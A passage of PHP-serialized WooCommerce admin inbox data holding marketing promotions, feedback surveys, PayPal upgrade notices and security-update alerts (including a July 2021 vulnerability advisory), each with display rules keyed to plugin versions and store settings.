feedback\";}}s:3:\"url\";s:39:\"https://automattic.survey.fm/wc-pay-new\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:1:{i:0;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:45:\"woocommerce_task_list_tracked_completed_tasks\";s:9:\"operation\";s:8:\"contains\";s:5:\"value\";s:20:\"woocommerce-payments\";s:7:\"default\";a:0:{}}}}s:29:\"share-your-feedback-on-paypal\";O:8:\"stdClass\":8:{s:4:\"slug\";s:29:\"share-your-feedback-on-paypal\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:29:\"Share your feedback on PayPal\";s:7:\"content\";s:127:\"Share your feedback in this 2 minute survey about how we can make the process of accepting payments more useful for your store.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:14:\"share-feedback\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:14:\"Share feedback\";}}s:3:\"url\";s:43:\"http://automattic.survey.fm/paypal-feedback\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:26:\"woocommerce-gateway-stripe\";}}}}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:43:\"woocommerce-gateway-paypal-express-checkout\";}}}}s:31:\"wcpay_instant_deposits_gtm_2021\";O:8:\"stdClass\":8:{s:4:\"slug\";s:31:\"wcpay_instant_deposits_gtm_2021\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:69:\"Get paid within minutes – Instant Deposits for WooCommerce Payments\";s:7:\"content\";s:384:\"Stay flexible with immediate access to your funds when you need them – including nights, weekends, and holidays. With <a href=\"https://woocommerce.com/products/woocommerce-payments/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_instant_deposits\">WooCommerce Payments\'</a> new Instant Deposits feature, you’re able to transfer your earnings to a debit card within minutes.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:40:\"Learn about Instant Deposits eligibility\";}}s:3:\"url\";s:136:\"https://docs.woocommerce.com/document/payments/instant-deposits/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_instant_deposits\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-05-18 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:19:\"publish_before_time\";s:14:\"publish_before\";s:19:\"2021-06-01 00:00:00\";}i:2;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:5:\"value\";s:2:\"US\";s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:20:\"woocommerce-payments\";}}}}s:31:\"google_listings_and_ads_install\";O:8:\"stdClass\":8:{s:4:\"slug\";s:31:\"google_listings_and_ads_install\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:35:\"Drive traffic and sales with Google\";s:7:\"content\";s:123:\"Reach online shoppers to drive traffic and sales for your store by showcasing products across Google, for free or with ads.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:11:\"get-started\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:11:\"Get started\";}}s:3:\"url\";s:56:\"https://woocommerce.com/products/google-listings-and-ads\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-06-09 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:23:\"google_listings_and_ads\";}}}}i:2;O:8:\"stdClass\":3:{s:4:\"type\";s:11:\"order_count\";s:9:\"operation\";s:1:\">\";s:5:\"value\";i:10;}}}s:39:\"wc-subscriptions-security-update-3-0-15\";O:8:\"stdClass\":8:{s:4:\"slug\";s:39:\"wc-subscriptions-security-update-3-0-15\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:42:\"WooCommerce Subscriptions security update!\";s:7:\"content\";s:736:\"We recently released an important security update to WooCommerce Subscriptions. To ensure your site\'s data is protected, please upgrade <strong>WooCommerce Subscriptions to version 3.0.15</strong> or later.<br/><br/>Click the button below to view and update to the latest Subscriptions version, or log in to <a href=\"https://woocommerce.com/my-dashboard\">WooCommerce.com Dashboard</a> and navigate to your <strong>Downloads</strong> page.<br/><br/>We recommend always using the latest version of WooCommerce Subscriptions, and other software running on your site, to ensure maximum security.<br/><br/>If you have any questions we are here to help — just <a href=\"https://woocommerce.com/my-account/create-a-ticket/\">open a ticket</a>.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:30:\"update-wc-subscriptions-3-0-15\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:19:\"View latest version\";}}s:3:\"url\";s:30:\"&page=wc-addons§ion=helper\";s:18:\"url_is_admin_query\";b:1;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:1:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:25:\"woocommerce-subscriptions\";s:8:\"operator\";s:1:\"<\";s:7:\"version\";s:6:\"3.0.15\";}}}s:29:\"woocommerce-core-update-5-4-0\";O:8:\"stdClass\":8:{s:4:\"slug\";s:29:\"woocommerce-core-update-5-4-0\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:31:\"Update to WooCommerce 5.4.1 now\";s:7:\"content\";s:140:\"WooCommerce 5.4.1 addresses a checkout issue discovered in WooCommerce 5.4. We recommend upgrading to WooCommerce 5.4.1 as soon as possible.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:20:\"update-wc-core-5-4-0\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:25:\"How to update WooCommerce\";}}s:3:\"url\";s:64:\"https://docs.woocommerce.com/document/how-to-update-woocommerce/\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:1:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:1:\"=\";s:7:\"version\";s:5:\"5.4.0\";}}}s:19:\"wcpay-promo-2020-11\";O:8:\"stdClass\":7:{s:4:\"slug\";s:19:\"wcpay-promo-2020-11\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:19:\"wcpay-promo-2020-11\";s:7:\"content\";s:19:\"wcpay-promo-2020-11\";}}s:5:\"rules\";a:0:{}}s:19:\"wcpay-promo-2020-12\";O:8:\"stdClass\":7:{s:4:\"slug\";s:19:\"wcpay-promo-2020-12\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:19:\"wcpay-promo-2020-12\";s:7:\"content\";s:19:\"wcpay-promo-2020-12\";}}s:5:\"rules\";a:0:{}}s:30:\"wcpay-promo-2021-6-incentive-1\";O:8:\"stdClass\":8:{s:4:\"slug\";s:30:\"wcpay-promo-2021-6-incentive-1\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:82:\"Simplify the payments process for you and your customers with WooCommerce Payments\";s:7:\"content\";s:704:\"With <a href=\"https://woocommerce.com/payments/?utm_medium=notification&utm_source=product&utm_campaign=wcpay601\">WooCommerce Payments</a>, you can securely accept all major cards, Apple Pay®, and recurring revenue in over 100 currencies. \n Built into your store’s WooCommerce dashboard, track cash flow and manage all of your transactions in one place – with no setup costs or monthly fees.\n <br/><br/>\n By clicking \"Get WooCommerce Payments,\" you agree to the <a href=\"https://wordpress.com/tos/?utm_medium=notification&utm_source=product&utm_campaign=wcpay601\">Terms of Service</a> \n and acknowledge you have read the <a href=\"https://automattic.com/privacy/\">Privacy Policy</a>.\n \";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:25:\"get-woo-commerce-payments\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:24:\"Get WooCommerce Payments\";}}s:3:\"url\";s:57:\"admin.php?page=wc-admin&action=setup-woocommerce-payments\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:12:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:6:{i:0;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:1:\"1\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:1:\"3\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:1:\"5\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:1:\"7\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:4;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:1:\"9\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:5;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:2:\"11\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}}}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:4:{i:0;s:17:\"crowdsignal-forms\";i:1;s:11:\"layout-grid\";i:2;s:17:\"full-site-editing\";i:3;s:13:\"page-optimize\";}}}}i:2;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:5:\"value\";s:2:\"US\";s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:26:\"woocommerce_allow_tracking\";s:5:\"value\";s:3:\"yes\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:4;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:2:\">=\";s:4:\"days\";i:31;}i:5;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:20:\"woocommerce-payments\";}}}}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.0\";}i:7;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:10:\"db_version\";s:5:\"value\";s:5:\"45805\";s:7:\"default\";i:0;s:9:\"operation\";s:2:\">=\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:19:\"wcpay-promo-2020-11\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:9;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:19:\"wcpay-promo-2020-11\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:10;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:19:\"wcpay-promo-2020-12\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:11;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:19:\"wcpay-promo-2020-12\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:30:\"wcpay-promo-2021-6-incentive-2\";O:8:\"stdClass\":8:{s:4:\"slug\";s:30:\"wcpay-promo-2021-6-incentive-2\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:82:\"Simplify the payments process for you and your customers with WooCommerce Payments\";s:7:\"content\";s:704:\"With <a href=\"https://woocommerce.com/payments/?utm_medium=notification&utm_source=product&utm_campaign=wcpay601\">WooCommerce Payments</a>, you can securely accept all major cards, Apple Pay®, and recurring revenue in over 100 currencies. \n Built into your store’s WooCommerce dashboard, track cash flow and manage all of your transactions in one place – with no setup costs or monthly fees.\n <br/><br/>\n By clicking \"Get WooCommerce Payments,\" you agree to the <a href=\"https://wordpress.com/tos/?utm_medium=notification&utm_source=product&utm_campaign=wcpay601\">Terms of Service</a> \n and acknowledge you have read the <a href=\"https://automattic.com/privacy/\">Privacy Policy</a>.\n \";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:24:\"get-woocommerce-payments\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:24:\"Get WooCommerce Payments\";}}s:3:\"url\";s:57:\"admin.php?page=wc-admin&action=setup-woocommerce-payments\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:12:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:6:{i:0;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:1:\"2\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:1:\"4\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:1:\"6\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:1:\"8\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:4;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:2:\"10\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:5;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";s:2:\"12\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}}}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:4:{i:0;s:17:\"crowdsignal-forms\";i:1;s:11:\"layout-grid\";i:2;s:17:\"full-site-editing\";i:3;s:13:\"page-optimize\";}}}}i:2;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:5:\"value\";s:2:\"US\";s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:26:\"woocommerce_allow_tracking\";s:5:\"value\";s:3:\"yes\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:4;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:2:\">=\";s:4:\"days\";i:31;}i:5;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:20:\"woocommerce-payments\";}}}}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.0\";}i:7;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:10:\"db_version\";s:5:\"value\";s:5:\"45805\";s:7:\"default\";i:0;s:9:\"operation\";s:2:\">=\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:19:\"wcpay-promo-2020-11\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:9;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:19:\"wcpay-promo-2020-11\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:10;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:19:\"wcpay-promo-2020-12\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:11;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:19:\"wcpay-promo-2020-12\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:34:\"ppxo-pps-upgrade-paypal-payments-1\";O:8:\"stdClass\":8:{s:4:\"slug\";s:34:\"ppxo-pps-upgrade-paypal-payments-1\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:47:\"Get the latest PayPal extension for WooCommerce\";s:7:\"content\";s:440:\"Heads up! There\'s a new PayPal on the block!<br/><br/>Now is a great time to upgrade to our latest <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">PayPal extension</a> to continue to receive support and updates with PayPal.<br/><br/>Get access to a full suite of PayPal payment methods, extensive currency and country coverage, and pay later options with the all-new PayPal extension for WooCommerce.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:34:\"ppxo-pps-install-paypal-payments-1\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:18:\"View upgrade guide\";}}s:3:\"url\";s:96:\"https://docs.woocommerce.com/document/woocommerce-paypal-payments/paypal-payments-upgrade-guide/\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:27:\"woocommerce-paypal-payments\";}}}}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:2:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:43:\"woocommerce-gateway-paypal-express-checkout\";}}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:27:\"woocommerce_paypal_settings\";s:9:\"operation\";s:2:\"!=\";s:5:\"value\";b:0;s:7:\"default\";b:0;}}}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";i:7;s:7:\"default\";i:1;s:9:\"operation\";s:1:\"<\";}}}s:34:\"ppxo-pps-upgrade-paypal-payments-2\";O:8:\"stdClass\":8:{s:4:\"slug\";s:34:\"ppxo-pps-upgrade-paypal-payments-2\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:31:\"Upgrade your PayPal experience!\";s:7:\"content\";s:513:\"We\'ve developed a whole new <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">PayPal extension for WooCommerce</a> that combines the best features of our many PayPal extensions into just one extension.<br/><br/>Get access to a full suite of PayPal payment methods, extensive currency and country coverage, offer subscription and recurring payments, and the new PayPal pay later options.<br/><br/>Start using our latest PayPal today to continue to receive support and updates.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:34:\"ppxo-pps-install-paypal-payments-2\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:18:\"View upgrade guide\";}}s:3:\"url\";s:96:\"https://docs.woocommerce.com/document/woocommerce-paypal-payments/paypal-payments-upgrade-guide/\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:27:\"woocommerce-paypal-payments\";}}}}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:2:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:43:\"woocommerce-gateway-paypal-express-checkout\";}}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:27:\"woocommerce_paypal_settings\";s:9:\"operation\";s:2:\"!=\";s:5:\"value\";b:0;s:7:\"default\";b:0;}}}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:36:\"woocommerce_inbox_variant_assignment\";s:5:\"value\";i:6;s:7:\"default\";i:1;s:9:\"operation\";s:1:\">\";}}}s:46:\"woocommerce-core-sqli-july-2021-need-to-update\";O:8:\"stdClass\":8:{s:4:\"slug\";s:46:\"woocommerce-core-sqli-july-2021-need-to-update\";s:4:\"type\";s:6:\"update\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:56:\"Action required: Critical vulnerabilities in WooCommerce\";s:7:\"content\";s:570:\"In response to a critical vulnerability identified on July 13, 2021, we are working with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br/><br/>Our investigation into this vulnerability is ongoing, but <strong>we wanted to let you know now about the importance of updating immediately</strong>.<br/><br/>For more information on which actions you should take, as well as answers to FAQs, please urgently review our blog post detailing this issue.\";}}s:7:\"actions\";a:2:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:146:\"https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=vulnerability_comms\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}i:1;O:8:\"stdClass\":6:{s:4:\"name\";s:7:\"dismiss\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:7:\"Dismiss\";}}s:3:\"url\";b:0;s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:0;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:23:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.3.6\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.4.8\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.5.9\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.6.6\";}i:4;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.7.2\";}i:5;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.8.2\";}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\"!=\";s:7:\"version\";s:5:\"3.9.4\";}i:7;O:8:\"stdClass\":4:{s:4:\"